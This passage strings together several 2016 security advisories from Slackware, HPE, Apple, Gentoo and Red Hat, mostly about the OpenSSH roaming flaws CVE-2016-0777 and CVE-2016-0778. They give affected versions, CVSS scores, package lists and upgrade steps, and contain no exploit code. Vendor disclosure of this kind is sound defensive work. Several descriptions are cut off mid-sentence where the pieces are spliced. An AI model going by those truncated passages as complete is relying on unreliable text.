http://www.openssh.com/legacy.html\n * Support for the legacy v00 cert format has been removed. \n * The default for the sshd_config(5) PermitRootLogin option has\n changed from \"yes\" to \"prohibit-password\". \n * PermitRootLogin=without-password/prohibit-password now bans all\n interactive authentication methods, allowing only public-key,\n hostbased and GSSAPI authentication (previously it permitted\n keyboard-interactive and password-less authentication if those\n were enabled). \n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssh-7.1p2-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssh-7.1p2-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssh-7.1p2-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssh-7.1p2-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssh-7.1p2-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssh-7.1p2-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssh-7.1p2-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssh-7.1p2-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssh-7.1p2-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssh-7.1p2-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssh-7.1p2-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssh-7.1p2-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n856dd9c1b10641c282f30a34b7b63bea openssh-7.1p2-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n80903b0829f0284d007e7a316f2ff2da openssh-7.1p2-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n2095d1a304a94bab44993fdb7e0781c8 openssh-7.1p2-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n5bf653d7f5b4a9426ff2c5888af99f00 openssh-7.1p2-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n53e09b4371c045b9de1c86e0826324f9 openssh-7.1p2-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\ncd0319ff3c574c50612d5ba2b38f2fdc openssh-7.1p2-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n98cdc1d6ffea2a06d0c8013078681bff openssh-7.1p2-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n2093f3e91a79e07f072c702a1704be73 openssh-7.1p2-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nd051d9f31cd380436ad01fa1641be1c7 openssh-7.1p2-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nf1f81757431c3c836f06ce5d22e2d5de openssh-7.1p2-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n70db20c5e4152bc9967b1e24cf91ed98 n/openssh-7.1p2-i586-1.txz\n\nSlackware x86_64 -current package:\ne13dc3da27f817bee693fbb907015817 n/openssh-7.1p2-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg openssh-7.1p2-i486-1_slack14.1.txz\n\nNext, restart the sshd daemon:\n# sh /etc/rc.d/rc.sshd restart\n\nThen before logging out, make sure that you still have remote access!\nSee the information about incompatible changes in OpenSSH 7.x above. \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05247375\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05247375\nVersion: 1\n\nHPSBGN03638 rev.1 - HPE Remote Device Access: Virtual Customer Access System\n(vCAS) using lighttpd and OpenSSH, Unauthorized Modification of Information,\nRemote Denial of Service (DoS), Remote Disclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2016-08-29\nLast Updated: 2016-08-29\n\nPotential Security Impact: Remote Denial of Service (DoS), Disclosure of\nInformation, Unauthorized Modification Of Information\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential vulnerabilities have been identified in the lighttpd and OpenSSH\nversion used in HPE Remote Device Access: Virtual Customer Access System\n(vCAS). These vulnerabilities could be exploited remotely resulting in\nunauthorized modification of information, denial of service (DoS), and\ndisclosure of information. \n\nReferences:\n\nCVE-2015-3200\nCVE-2016-0777\nCVE-2016-0778\nPSRT110211\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHPE Remote Device Access: Virtual Customer Access System (vCAS) - v15.07 (RDA\n8.1) and earlier. \n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2015-3200\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)\n\n CVE-2016-0777\n 6.5 CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)\n\n CVE-2016-0778\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has made the following updates available to resolve the vulnerabilities\nin Remote Device Access: Virtual Customer Access System (vCAS)\n\nvCAS 16.05 (RDA 8.7) kits - hp-rdacas-16.05-10482-vbox.ova and\nhp-rdacas-16.05-10482.ova. \n\nThe Oracle VirtualBox kit is available at:\nhttps://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482-vbox.ova\n\nThe VMware ESX(i) and VMware Player kit is available at:\nhttps://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482.ova\n\nHISTORY\nVersion:1 (rev.1) - 29 August 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update\n2016-002\n\nOS X El Capitan 10.11.4 and Security Update 2016-002 is now available\nand addresses the following:\n\napache_mod_php\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by updating libpng to version\n1.6.20. \nCVE-ID\nCVE-2015-8126 : Adam Mari\u0161\nCVE-2015-8472 : Adam Mari\u0161\n\nAppleRAID\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1733 : Proteas of Qihoo 360 Nirvan Team\n\nAppleRAID\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to determine kernel memory layout\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1732 : Proteas of Qihoo 360 Nirvan Team\n\nAppleUSBNetworking\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the parsing of\ndata from USB devices. This issue was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path\n\nBluetooth\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1735 : Jeonghoon Shin@A.D.D\nCVE-2016-1736 : beist and ABH of BoB\n\nCarbon\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .dfont file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2016-1737 : an anonymous researcher\n\ndyld\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker may tamper with code-signed applications to\nexecute arbitrary code in the application\u0027s context\nDescription: A code signing verification issue existed in dyld. \nCVE-ID\nCVE-2016-1738 : beist and ABH of BoB\n\nFontParser\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Opening a maliciously crafted PDF file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with\nTrend Micro\u0027s Zero Day Initiative (ZDI)\n\nHTTPProtocol\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple vulnerabilities existed in nghttp2 versions\nprior to 1.6.0, the most serious of which may have led to remote code\nexecution. These were addressed by updating nghttp2 to version 1.6.0. \nCVE-ID\nCVE-2015-8659\n\nIntel Graphics Driver\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1743 : Piotr Bania of Cisco Talos\nCVE-2016-1744 : Ian Beer of Google Project Zero\n\nIOFireWireFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to cause a denial of service\nDescription: A null pointer dereference was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1745 : sweetchip of Grayhash\n\nIOGraphics\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1746 : Peter Pi of Trend Micro working with Trend Micro\u0027s\nZero Day Initiative (ZDI)\nCVE-2016-1747 : Juwei Lin of Trend Micro working with Trend Micro\u0027s\nZero Day Initiative (ZDI)\n\nIOHIDFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to determine kernel memory layout\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1748 : Brandon Azad\n\nIOUSBFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1749 : Ian Beer of Google Project Zero and Juwei Lin of\nTrend Micro working with Trend Micro\u0027s Zero Day Initiative (ZDI)\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed through improved\nmemory management. \nCVE-ID\nCVE-2016-1750 : CESG\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A race condition existed during the creation of new\nprocesses. This was addressed through improved state handling. \nCVE-ID\nCVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaca\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team\n\nKernel\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team\nCVE-2016-1755 : Ian Beer of Google Project Zero\nCVE-2016-1759 : lokihardt\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to determine kernel memory layout\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1758 : Brandon Azad\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple integer overflows were addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro\u0027s Zero\nDay Initiative (ZDI)\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to cause a denial of service\nDescription: A denial of service issue was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1752 : CESG\n\nlibxml2\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2015-1819\nCVE-2015-5312 : David Drysdale of Google\nCVE-2015-7499\nCVE-2015-7500 : Kostya Serebryany of Google\nCVE-2015-7942 : Kostya Serebryany of Google\nCVE-2015-8035 : gustavo.grieco\nCVE-2015-8242 : Hugh Davenport\nCVE-2016-1761 : wol0xff working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\nCVE-2016-1762\n\nMessages\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker who is able to bypass Apple\u0027s certificate\npinning, intercept TLS connections, inject messages, and record\nencrypted attachment-type messages may be able to read attachments\nDescription: A cryptographic issue was addressed by rejecting\nduplicate messages on the client. \nCVE-ID\nCVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk,\nIan Miers, and Michael Rushanan of Johns Hopkins University\n\nMessages\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Clicking a JavaScript link can reveal sensitive user\ninformation\nDescription: An issue existed in the processing of JavaScript links. \nThis issue was addressed through improved content security policy\nchecks. \nCVE-ID\nCVE-2016-1764 : Matthew Bryan of the Uber Security Team (formerly of\nBishop Fox), Joe DeMesy and Shubham Shah of Bishop Fox\n\nNVIDIA Graphics Drivers\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1741 : Ian Beer of Google Project Zero\n\nOpenSSH\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Connecting to a server may leak sensitive user information,\nsuch as a client\u0027s private keys\nDescription: Roaming, which was on by default in the OpenSSH client,\nexposed an information leak and a buffer overflow. These issues were\naddressed by disabling roaming in the client. \nCVE-ID\nCVE-2016-0777 : Qualys\nCVE-2016-0778 : Qualys\n\nOpenSSH\nAvailable for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\nImpact: Multiple vulnerabilities in LibreSSL\nDescription: Multiple vulnerabilities existed in LibreSSL versions\nprior to 2.1.8. These were addressed by updating LibreSSL to version\n2.1.8. \nCVE-ID\nCVE-2015-5333 : Qualys\nCVE-2015-5334 : Qualys\n\nOpenSSL\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A remote attacker may be able to cause a denial of service\nDescription: A memory leak existed in OpenSSL versions prior to\n0.9.8zh. This issue was addressed by updating OpenSSL to version\n0.9.8zh. \nCVE-ID\nCVE-2015-3195\n\nPython\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by updating libpng to version\n1.6.20. \nCVE-ID\nCVE-2014-9495\nCVE-2015-0973\nCVE-2015-8126 : Adam Mari\u0161\nCVE-2015-8472 : Adam Mari\u0161\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted FlashPix Bitmap Image may\nlead to unexpected application termination or arbitrary code\nexecution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1767 : Francis Provencher from COSIG\nCVE-2016-1768 : Francis Provencher from COSIG\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted Photoshop document may lead\nto unexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1769 : Francis Provencher from COSIG\n\nReminders\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Clicking a tel link can make a call without prompting the\nuser\nDescription: A user was not prompted before invoking a call. This\nwas addressed through improved entitlement checks. \nCVE-ID\nCVE-2016-1770 : Guillaume Ross of Rapid7 and Laurent Chouinard of\nLaurent.ca\n\nRuby\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription: An unsafe tainted string usage vulnerability existed in\nversions prior to 2.0.0-p648. \nCVE-ID\nCVE-2015-7551\n\nSecurity\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to check for the existence of\narbitrary files\nDescription: A permissions issue existed in code signing tools. This\nwas addressed though additional ownership checks. \nCVE-ID\nCVE-2016-1773 : Mark Mentovai of Google Inc. \n\nSecurity\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted certificate may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the ASN.1 decoder. \nThis issue was addressed through improved input validation. \nCVE-ID\nCVE-2016-1950 : Francis Gabriel of Quarkslab\n\nTcl\nAvailable for: \nOS X Yosemite v10.10.5 and OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by removing libpng. \nCVE-ID\nCVE-2015-8126 : Adam Mari\u0161\n\nTrueTypeScaler\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2016-1775 : 0x1byte working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\n\nWi-Fi\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker with a privileged network position may be able\nto execute arbitrary code\nDescription: A frame validation and memory corruption issue existed\nfor a given ethertype. This issue was addressed through additional\nethertype validation and improved memory handling. \nCVE-ID\nCVE-2016-0801 : an anonymous researcher\nCVE-2016-0802 : an anonymous researcher\n\nOS X El Capitan 10.11.4 includes the security content of Safari 9.1. \nhttps://support.apple.com/kb/HT206171\n\nOS X El Capitan v10.11.4 and Security Update 2016-002 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJW8JQFAAoJEBcWfLTuOo7tZSYP/1bHFA1qemkD37uu7nYpk/q6\nARVsPgME1I1+5tOxX0TQJgzMBmdQsKYdsTiLpDk5HTuv+dAMsFfasaUItGk8Sz1w\nHiYjSfVsxL+Pjz3vK8/4/fsi2lX6472MElRw8gudITOhXtniGcKo/vuA5dB+vM3l\nJy1NLHHhZ6BD2t0bBmlz41mZMG3AMxal2wfqE+5LkjUwASzcvC/3B1sh7Fntwyau\n/71vIgMQ5AaETdgQJAuQivxPyTlFduBRgLjqvPiB9eSK4Ctu5t/hErFIrP2NiDCi\nUhfZC48XbiRjJfkUsUD/5TIKnI+jkZxOnch9ny32dw2kUIkbIAbqufTkzsMXOpng\nO+rI93Ni7nfzgI3EkI2bq+C+arOoRiveWuJvc3SMPD5RQHo4NCQVs0ekQJKNHF78\njuPnY29n8WMjwLS6Zfm+bH+n8ELIXrmmEscRztK2efa9S7vJe+AgIxx7JE/f8OHF\ni9K7UQBXFXcpMjXi1aTby/IUnpL5Ny4NVwYwIhctj0Mf6wTH7uf/FMWYIQOXcIfP\nIzo+GXxNeLd4H2ypZ+UpkZg/Sn2mtCd88wLc96+owlZPBlSqWl3X1wTlp8i5FP2X\nqlQ7RcTHJDv8jPT/MOfzxEK1n/azp45ahHA0o6nohUdxlA7PLci9vPiJxqKPo/0q\nVZmOKa8qMxB1L/JmdCqy\n=mZR+\n-----END PGP SIGNATURE-----\n. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/openssh \u003c 7.1_p2 \u003e= 7.1_p2\n\nDescription\n===========\n\nQualys have reported two issues in the \"roaming\" code included in the\nOpenSSH client, which provides undocumented, experimental support for\nresuming SSH connections. To do\nso, add \"UseRoaming no\" to the SSH client configuration, or specify \"-o\n\u0027UseRoaming no\u0027\" on the command line. \n\nResolution\n==========\n\nAll OpenSSH users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/openssh-7.1_p2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2016-0777\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0777\n[ 2 ] CVE-2016-0778\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0778\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201601-01\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssh security update\nAdvisory ID: RHSA-2016:0043-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-0043.html\nIssue date: 2016-01-14\nCVE Names: CVE-2016-0777 CVE-2016-0778 \n=====================================================================\n\n1. Summary:\n\nUpdated openssh packages that fix two security issues are now available for\nRed Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSH is OpenBSD\u0027s SSH (Secure Shell) protocol implementation. \nThese packages include the core files necessary for both the OpenSSH client\nand server. (CVE-2016-0778)\n\nRed Hat would like to thank Qualys for reporting these issues. \n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the OpenSSH server daemon (sshd) will be restarted automatically. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 